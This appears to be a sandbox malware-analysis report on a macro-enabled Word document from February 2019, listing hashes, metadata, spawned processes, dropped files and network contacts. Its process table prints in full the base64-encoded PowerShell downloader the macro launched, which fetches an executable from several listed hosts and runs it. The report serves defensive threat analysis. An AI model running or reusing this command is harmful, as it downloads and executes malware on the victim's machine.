analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

DOC

Full analysis: https://app.any.run/tasks/7ff136fd-320c-4b36-9962-afe77e883e9e
Verdict: Malicious activity
Analysis date: February 18, 2019, 16:48:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 10:15:00 2019, Last Saved Time/Date: Mon Feb 18 10:15:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0
MD5:

62A629623AAC86FD9BD9FF74ABDB5D1E

SHA1:

B81CCFA9D2BF510399CFBABC2FAEAFD5C554ADAE

SHA256:

4BE4A46EF25E71DE87371345DA22D043385A72A479ADF2ED56326CD69B2D500D

SSDEEP:

6144:PG5/BnVfRFJ7KK9aHScdX9znGUEW1ZT+TveVmhjdtSm5:P2n9R/lA5dX9znGUESZTuveWdtSm5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powersheLl.exe (PID: 2516)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3008)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:02:18 10:15:00
ModifyDate: 2019:02:18 10:15:00
Pages: 1
Words: 1
Characters: 7
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 7
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3008"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\DOC.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2516powersheLl -e JABhAF8AXwBfADQANQAzADgAPQAoACcATAAzADMANwBfACcAKwAnADkAMQAnACkAOwAkAE4ANAA0AF8ANABfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFAAMQA2AF8AOAAwAF8AOQA9ACgAJwBoAHQAdABwADoAJwArACcALwAvACcAKwAnAGIAYQAnACsAJwB6AGUAZQAzACcAKwAnADYANQAuAGMAbwBtAC8AdgAnACsAJwA1ADkASAB4AFoAJwArACcAeQBAAGgAdAB0AHAAOgAnACsAJwAvAC8AZwBpAGEAbgBjAGEAJwArACcAcgAnACsAJwBsAG8AcgBhAHMAJwArACcAbwAuAGMAbwAnACsAJwBtAC8AeAB3AFMAaQBQADUANAAnACsAJwA3AEAAJwArACcAaAB0AHQAcAA6AC8ALwAxACcAKwAnADMALgAyADMAMwAuADEAJwArACcAOAAzAC4AMgAyADcAJwArACcALwA1AFYAZgBxAHEAcwBtAFYAQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvADEAJwArACcAMgA4AC4AMQAnACsAJwA5ADkALgAxADgANwAuADEAJwArACcAMgA0AC8AdgAzACcAKwAnADUAaAByAGIARgB6AEAAaAB0AHQAcAA6AC8ALwAxADAANAAuACcAKwAnADIAMgAnACsAJwAzAC4AJwArACcANAAwACcAKwAnAC4ANAAwACcAKwAnAC8AOABDAHEAUgAnACsAJwBJAEoAaABHACcAKwAnADQAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAcgAwADYAMwA5ADgAXwA9ACgAJwBLADMAMAA0ADMAJwArACcANgAnACsAJwA0ACcAKQA7ACQAbQA2ADgAXwA4ADgAIAA9ACAAKAAnADMAJwArACcANAA1ACcAKQA7ACQAQQBfADUAXwA0ADQAXwAxAD0AKAAnAGoAXwBfADAAJwArACcAMgAxACcAKQA7ACQAUAA3ADYAXwBfAF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAG0ANgA4AF8AOAA4ACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQARgAzAF8AMgAyAF8AMwAwACAAaQBuACAAJABQADEANgBfADgAMABfADkAKQB7AHQAcgB5AHsAJABOADQANABfADQAXwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABGADMAXwAyADIAXwAzADAALAAgACQAUAA3ADYAXwBfAF8AKQA7ACQAaQA1ADYANwA3AF8APQAoACcAdABfAF8AXwAnACsAJwAzADcAXwAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABQADcANgBfAF8AXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAFAANwA2AF8AXwBfADsAJABhADgAXwAzAF8AXwA4AF8APQAoACcATwAnACsAJwA0ADEAJwArACcAMwAyADUAMgAwACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABkADcAOAA4ADkANgBfAD0AKAAnAEUAJwArACcAMwAnACsAJwAxADkAXwA4ACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 194
Read events
793
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3008WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6AEF.tmp.cvr
MD5:
SHA256:
2516powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\18XMM8951K1WJXCCEB5Q.temp
MD5:
SHA256:
3008WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B0E727756D2E0BADB5367093BF613C2A
SHA256:EB25C272C7FB4D5F9DC594F2708BF28130364853D57B17E3AD5943E93E442EBC
3008WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DOC.doc.LNKlnk
MD5:A493E2C7503F37E291FB2659AACA2DA8
SHA256:3BA306A09F288EE5FBAE0CBE2C662898F4233A7E14054B22D588126D90BC956D
3008WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:7A5584B9C0A7A003575205CF64F01728
SHA256:62D9AE89274BA0A06218F3ADAF3630D6DFE7441C00B2077ED3B03EC505368782
2516powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2478ca.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3008WINWORD.EXEC:\Users\admin\Desktop\~$DOC.docpgc
MD5:810AD7C7DB9E1299C00E9D7750084302
SHA256:6F352BED49EAF318D8FFC7F1D21140503E4E3AE36084FA29B6885786FE651E4F
2516powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2516
powersheLl.exe
GET
404
52.66.202.63:80
http://bazee365.com/v59HxZy
IN
xml
345 b
suspicious
2516
powersheLl.exe
GET
404
104.223.40.40:80
http://104.223.40.40/8CqRIJhG4
US
xml
345 b
malicious
2516
powersheLl.exe
GET
404
13.233.183.227:80
http://13.233.183.227/5VfqqsmV
IN
xml
345 b
unknown
2516
powersheLl.exe
GET
404
128.199.187.124:80
http://128.199.187.124/v35hrbFz
SG
xml
345 b
malicious
2516
powersheLl.exe
GET
404
192.198.90.198:80
http://giancarloraso.com/xwSiP547
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2516
powersheLl.exe
52.66.202.63:80
bazee365.com
Amazon.com, Inc.
IN
suspicious
2516
powersheLl.exe
104.223.40.40:80
QuadraNet, Inc
US
malicious
2516
powersheLl.exe
192.198.90.198:80
giancarloraso.com
Centrilogic, Inc.
US
suspicious
2516
powersheLl.exe
13.233.183.227:80
Amazon.com, Inc.
IN
unknown
2516
powersheLl.exe
128.199.187.124:80
Digital Ocean, Inc.
SG
malicious

DNS requests

Domain
IP
Reputation
bazee365.com
  • 52.66.202.63
suspicious
giancarloraso.com
  • 192.198.90.198
malicious

Threats

No threats detected
No debug info